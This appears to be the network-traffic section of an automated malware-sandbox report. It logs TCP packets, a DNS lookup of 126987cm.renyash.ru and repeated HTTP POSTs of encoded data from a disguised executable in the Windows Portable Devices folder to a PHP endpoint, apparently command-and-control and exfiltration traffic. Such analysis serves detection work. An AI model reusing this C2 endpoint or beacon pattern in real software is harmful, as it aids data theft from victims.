                                                                                                                                Jan 1, 2025 21:48:49.942008972 CET5012180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:49.943753958 CET5012180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:49.948606014 CET8050121172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:50.296350002 CET5012180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:50.301263094 CET8050121172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:50.411025047 CET8050121172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:50.452397108 CET5012180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:50.677129030 CET8050121172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:50.717922926 CET5012180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:50.790383101 CET5012180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:50.791116953 CET5012280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:50.795465946 CET8050121172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:50.795526028 CET5012180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:50.795945883 CET8050122172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:50.796030998 CET5012280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:50.796118975 CET5012280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:50.800905943 CET8050122172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:51.168596029 CET5012280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:51.173475981 CET8050122172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:51.246347904 CET8050122172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:51.296062946 CET5012280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:51.510941982 CET8050122172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:51.561686039 CET5012280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:51.671597004 CET5012280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:51.793456078 CET5012380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:51.996387959 CET8050123172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:51.996479034 CET5012380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:51.996612072 CET5012380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:52.001450062 CET8050123172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:52.343014002 CET5012380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:52.347889900 CET8050123172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:52.449486971 CET8050123172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:52.499166965 CET5012380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:52.623080969 CET8050123172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:52.671042919 CET5012380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:52.762794018 CET5012380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:52.763490915 CET5012480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:52.768318892 CET8050124172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:52.768384933 CET5012480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:52.768533945 CET5012480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:52.773276091 CET8050124172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:52.782378912 CET8050123172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:52.782448053 CET5012380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:53.124298096 CET5012480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:53.129137993 CET8050124172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:53.231422901 CET8050124172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:53.280448914 CET5012480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:53.496126890 CET8050124172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:53.546065092 CET5012480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:53.621083975 CET5012580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:53.626013994 CET8050125172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:53.626082897 CET5012580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:53.626204014 CET5012580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:53.630970955 CET8050125172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:53.986680031 CET5012580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:53.991576910 CET8050125172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.101146936 CET8050125172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.145435095 CET5012580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.308953047 CET8050125172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.358560085 CET5012580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.433846951 CET5012580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.434721947 CET5012680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.438905001 CET8050125172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.438981056 CET5012580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.439527035 CET8050126172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.439596891 CET5012680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.439826965 CET5012680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.444567919 CET8050126172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.468596935 CET5012680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.468767881 CET5012780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.473542929 CET8050127172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.473613977 CET5012780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.473850965 CET5012780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.478621006 CET8050127172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.517998934 CET8050126172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.587709904 CET5012480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.590892076 CET5012880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.595684052 CET8050128172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.595746040 CET5012880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.595823050 CET5012880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.600599051 CET8050128172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.802721024 CET8050126172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.802772045 CET5012680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.829555988 CET5012780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.834408998 CET8050127172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.834472895 CET8050127172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.925796032 CET8050127172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.952347040 CET5012880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:54.957150936 CET8050128172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:54.967930079 CET5012780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.048865080 CET8050128172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:55.092920065 CET5012880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.175950050 CET8050127172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:55.217931986 CET5012780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.224039078 CET8050128172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:55.264799118 CET5012880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.337688923 CET5012780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.337706089 CET5012880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.338442087 CET5012980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.343302965 CET8050127172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:55.343322039 CET8050129172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:55.343332052 CET8050128172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:55.343365908 CET5012780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.343411922 CET5012880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.343507051 CET5012980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.343507051 CET5012980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.348273993 CET8050129172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:55.702524900 CET5012980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.707416058 CET8050129172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:55.788171053 CET8050129172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:55.843028069 CET5012980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:55.965631962 CET8050129172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:56.014905930 CET5012980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:56.086679935 CET5013080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:56.091586113 CET8050130172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:56.091656923 CET5013080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:56.091758966 CET5013080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:56.096518993 CET8050130172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:56.437292099 CET5013080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:56.442229033 CET8050130172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:56.713004112 CET8050130172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:56.764811993 CET5013080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:56.978677988 CET8050130172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:57.030431032 CET5013080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:57.098083973 CET8050130172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:57.155432940 CET5013080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:57.249267101 CET5013080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:57.249932051 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:57.254316092 CET8050130172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:57.254368067 CET5013080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:57.254760027 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:57.254828930 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:57.254924059 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:57.259707928 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:57.614315033 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:57.619230032 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:57.702872038 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:57.749190092 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.020695925 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.061717033 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.131938934 CET5012980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.135689020 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.136312962 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.140671968 CET8050131172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.140729904 CET5013180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.141096115 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.141160011 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.141271114 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.146013975 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.499340057 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.504179001 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.610589981 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.655435085 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.786775112 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.842969894 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.944658041 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.945313931 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.949704885 CET8050132172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.949755907 CET5013280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.950120926 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:58.950182915 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.950297117 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:58.955045938 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:59.296674967 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:59.301512003 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:59.394798994 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:59.436705112 CET5013380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:59.587954998 CET8050133172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:59.634958982 CET5013380192.168.2.4172.67.220.198

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Jan 1, 2025 21:47:26.022555113 CET5379753192.168.2.41.1.1.1
                                                                                                                                Jan 1, 2025 21:47:26.032793999 CET53537971.1.1.1192.168.2.4

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Jan 1, 2025 21:47:26.022555113 CET192.168.2.41.1.1.10x855Standard query (0)126987cm.renyash.ruA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Jan 1, 2025 21:47:26.032793999 CET1.1.1.1192.168.2.40x855No error (0)126987cm.renyash.ru172.67.220.198A (IP address)IN (0x0001)false
                                                                                                                                Jan 1, 2025 21:47:26.032793999 CET1.1.1.1192.168.2.40x855No error (0)126987cm.renyash.ru104.21.38.84A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • 126987cm.renyash.ru

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.449736172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:26.042237043 CET344OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 344
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:26.405664921 CET344OUTData Raw: 00 03 01 06 03 0f 04 05 05 06 02 01 02 01 01 05 00 03 05 0d 02 05 03 01 07 05 0c 0c 06 00 03 53 0d 53 03 0d 07 05 07 04 0e 56 07 07 05 50 04 04 03 05 0e 5b 0e 01 04 51 04 03 04 01 05 06 04 0c 01 01 0f 0b 00 01 04 07 0e 01 0b 00 0f 51 0f 08 05 01
                                                                                                                                Data Ascii: SSVP[QQZTW\L~|YjwLib[^BRScUc^s{_xBclcv|~oUtwcZe~V@{Sv}b[
                                                                                                                                Jan 1, 2025 21:47:26.486622095 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:26.761311054 CET1236INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:26 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YkE4CMH6q9Tm%2FBaiQgmQsW28ShB6KjKcf7mtvALbjyOZqFG2iWwmrOQ0jcP6n3srTsn2RfZKa8szH9k4DjujUMl%2B4JLsGnX8ZbI1SXZfeHuUWppMlT45fTbPAeNd1YEJs2taqYAv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d4e3d78de95-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2982&min_rtt=1612&rtt_var=3345&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=688&delivery_rate=116103&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 35 34 30 0d 0a 56 4a 7e 04 7b 6d 67 00 6c 61 60 05 7c 61 7f 03 7e 64 6c 54 6b 70 72 55 7a 4d 77 5c 6a 62 77 5b 77 73 7e 51 79 5f 54 59 76 76 70 4a 7c 61 78 01 55 4b 71 42 74 5c 67 02 68 62 79 00 7c 74 65 50 7b 66 60 0c 7e 4d 77 05 75 61 61 04 63 72 6a 5b 7c 62 76 05 7f 6c 60 0b 69 59 6b 4b 76 76 7b 06 7c 5c 5f 02 7d 63 7e 59 7b 5e 7c 43 6f 67 70 06 6f 53 59 49 6e 5c 7b 5a 7b 63 61 5f 7d 60 78 00 78 77 5d 5f 7e 04 70 5a 61 5f 5e 00 7a 51 41 5b 7f 49 55 50 6b 5f 61 4e 76 7f 6b 5f 78 52 74 04 77 70 54 0d 79 07 79 05 7e 52 7a 4c 6c 5f 79 5a 76 60 6c 5b 61 58 78 04 74 4f 54 50 7e 5d 7a 06 77 4c 6d 00 76 66 68 09 7f 0a 75 05 77 6f 7f 5d 7f 63 6c 49 6f 6c 5d 03 6c 59 76 00 7c 6d 60 08 74 77 6f 5e 7e 61 7d 50 7e 7d 6c 55 6c 0b 62 06 6a 5b 7e 5f 7b 5d 46 51 7c 42 5e 08 7e 60 52 0a 7c 77 50 00 78 0b 7f 06 79 62 78 48 7c 71 55 4b 7c 67 5a 51 7f 5e 65 08 79 70 70 42 7e 72 64 05 74 63 7d 51 7b 5c 79 03 76 76 74 4b 7e 76 5a 03 7e 76 5f 4f 77 4c 6b 01 7c 4c 71 01 7d 77 7a 08 7b 76 5a 42 7d 73 55 48 76 62 7d 02 77 [TRUNCATED]
                                                                                                                                Data Ascii: 540VJ~{mgla`|a~dlTkprUzMw\jbw[ws~Qy_TYvvpJ|axUKqBt\ghby|teP{f`~Mwuaacrj[|bvl`iYkKvv{|\_}c~Y{^|CogpoSYIn\{Z{ca_}`xxw]_~pZa_^zQA[IUPk_aNvk_xRtwpTyy~RzLl_yZv`l[aXxtOTP~]zwLmvfhuwo]clIol]lYv|m`two^~a}P~}lUlbj[~_{]FQ|B^~`R|wPxybxH|qUK|gZQ^eyppB~rdtc}Q{\yvvtK~vZ~v_OwLk|Lq}wz{vZB}sUHvb}wam|qzIllgcDwac{\}J|puD{w^{wZBy}Yxr|xc~L}pRJ{IdD}Lcv_dI~RU|IV|qau||{Btt^zyaW|lX{qrKvcsuqVLt_f
                                                                                                                                Jan 1, 2025 21:47:26.761328936 CET908INData Raw: 0b 7f 5e 54 05 74 4c 69 00 77 65 60 08 7f 42 57 4c 77 7c 60 00 7c 73 60 03 78 6c 7b 06 78 5e 76 03 7f 43 6c 41 74 67 78 4e 7f 62 6e 0b 7d 6d 55 41 78 53 7e 4e 7d 5c 61 05 7f 4e 52 0c 7f 6c 5e 0b 7e 70 7c 09 7e 49 7e 4e 78 43 77 02 78 5c 7c 49 7c
                                                                                                                                Data Ascii: ^TtLiwe`BWLw|`|s`xl{x^vClAtgxNbn}mUAxS~N}\aNRl^~p|~I~NxCwx\|I|q{K~gUO|^}OycZ}L|It]WAzO}uvpH}HZ~HS@tbkI|LeL|wX{X`}McurywaS~qT|`}IwDwqs{b[I}^SIxg`LxwZOxm{Fy\^{sf{]NZxg`K}{bqxI~B]}wpkbzPvUwZolRtYyQyOX]}v_z\
                                                                                                                                Jan 1, 2025 21:47:26.832427979 CET320OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 384
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:47:26.926012039 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:47:26.940529108 CET384OUTData Raw: 54 55 5b 56 53 44 5c 52 5d 56 5b 57 54 58 51 53 58 52 58 58 5b 5e 57 42 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU[VSD\R]V[WTXQSXRXX[^WBVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'T$46?^0>46+$(8#%$T'"X=&:( X2:!^&%X*7
                                                                                                                                Jan 1, 2025 21:47:27.196523905 CET952INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:47:27 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fc1cHuBPzTKMTRHGT2qOx84JdFKkRCYNrcKFrEhTRlEqBNBaOTUhJOsbiiZeS1sXClxMPE9XRpLXNJX60jZA7QXfufEo4Ku3dMuYVLHlkWjHXXR1kSuAcuFsxjftuted7WIppoFA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55d50fe31de95-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4288&min_rtt=1612&rtt_var=5019&sent=9&recv=10&lost=0&retrans=0&sent_bytes=2194&recv_bytes=1392&delivery_rate=2455156&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 11 3c 08 2b 56 37 0c 29 54 3e 01 2b 11 25 57 26 12 31 33 32 1c 28 5e 33 15 2a 2f 20 1b 32 3f 3b 05 24 5c 29 51 3c 0c 3f 05 2b 36 20 5c 05 1b 3a 07 33 29 27 13 31 38 25 57 29 1e 02 58 37 01 26 5e 3d 20 23 0f 20 3b 26 04 32 3b 29 10 26 2a 26 11 2b 12 0a 04 3d 23 3b 1c 24 2d 2a 51 0f 16 3b 0a 2a 30 03 02 3d 2c 23 02 26 21 2b 01 22 0b 25 55 31 2b 24 0a 27 2a 36 11 3c 2d 24 0e 23 33 30 0b 25 2f 21 00 32 07 2c 0d 2c 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!<+V7)T>+%W&132(^3*/ 2?;$\)Q<?+6 \:3)'18%W)X7&^= # ;&2;)&*&+=#;$-*Q;*0=,#&!+"%U1+$'*6<-$#30%/!2,,:&^ "S?UV0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.449737172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:28.017227888 CET345OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1780
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:47:28.387712002 CET1780OUTData Raw: 54 50 5e 53 56 4a 59 50 5d 56 5b 57 54 5e 51 5b 58 51 58 50 5b 50 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TP^SVJYP]V[WT^Q[XQXP[PWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["&"/ !9X!<$(6<+$P5%$0:Y(5>>.41!^&%X*/
                                                                                                                                Jan 1, 2025 21:47:28.461664915 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.449739172.67.220.19880180C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 1, 2025 21:47:28.135123968 CET321OUTPOST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
